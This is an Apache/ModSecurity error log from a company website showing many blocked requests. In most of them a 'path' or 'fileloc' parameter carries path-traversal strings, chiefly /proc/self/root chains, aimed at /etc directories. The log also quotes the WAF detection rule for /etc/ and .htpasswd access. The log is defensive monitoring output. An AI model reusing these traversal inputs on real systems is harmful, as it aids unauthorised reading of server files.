[Tue Mar 17 16:40:01.439273 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:47470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuEcU6Sx0TG1YjmQi-UwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:04.647683 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:47482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuFKBJNF7axNlVR0UoRwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:06.126067 2026] [proxy_fcgi:error] [pid 29151:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:40:06.135538 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:47486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuFvPqhzTj3BvfDX-XpwAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:06.438213 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:42042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuFtY0UrI5A3LftIwNLAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:40:08.093985 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:51328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuGHIk7brgkOH-rIWb2AAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:11.720926 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:51340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuG64xEDsg_V3ESNZbIQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:18.075691 2026] [:error] [pid 7437:tid 140411616036608] [client 216.73.216.191:34680] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuIgeiSKl8TjouI-YnlgAAA88"]
[Tue Mar 17 16:40:28.038466 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:40:32.371736 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:45842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuMHIk7brgkOH-rIWb4wAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:40:52.130606 2026] [proxy_fcgi:error] [pid 18380:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:40:56.454909 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.243.128:48664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuSIh-PF_25v4hFRB7AgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:40:57.428953 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:42322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuScU6Sx0TG1YjmQi-YQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:03.055347 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:42328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuT3Ik7brgkOH-rIWb6AAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:09.091139 2026] [:error] [pid 29151:tid 140411574073088] [client 216.73.216.191:38412] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuVfPqhzTj3BvfDX-XtAAAAdQ"]
[Tue Mar 17 16:41:15.125818 2026] [proxy_fcgi:error] [pid 7437:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:41:18.913588 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:59238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuXvPqhzTj3BvfDX-XtwAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:21.723403 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:59250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuYaBJNF7axNlVR0UoYAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:24.791737 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:59252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuZBj0p0SRWAqcjGGJhgAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:25.348448 2026] [:error] [pid 18380:tid 140411632822016] [client 216.73.216.191:30319] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuZa4xEDsg_V3ESNZbOQAAAg0"]
[Tue Mar 17 16:41:36.964209 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:36794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmucIh-PF_25v4hFRB7CwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:38.129777 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51160] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:41:39.155457 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.241.31:48718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmucweiSKl8TjouI-YnrgAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:41.344245 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:48728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmudPPqhzTj3BvfDX-XvwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:43.617386 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:48734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmud64xEDsg_V3ESNZbPwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:46.040743 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:48742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuetY0UrI5A3LftIwNSQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:46.553696 2026] [:error] [pid 29151:tid 140411649607424] [client 216.73.216.191:41639] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuevPqhzTj3BvfDX-XwgAAAcs"]
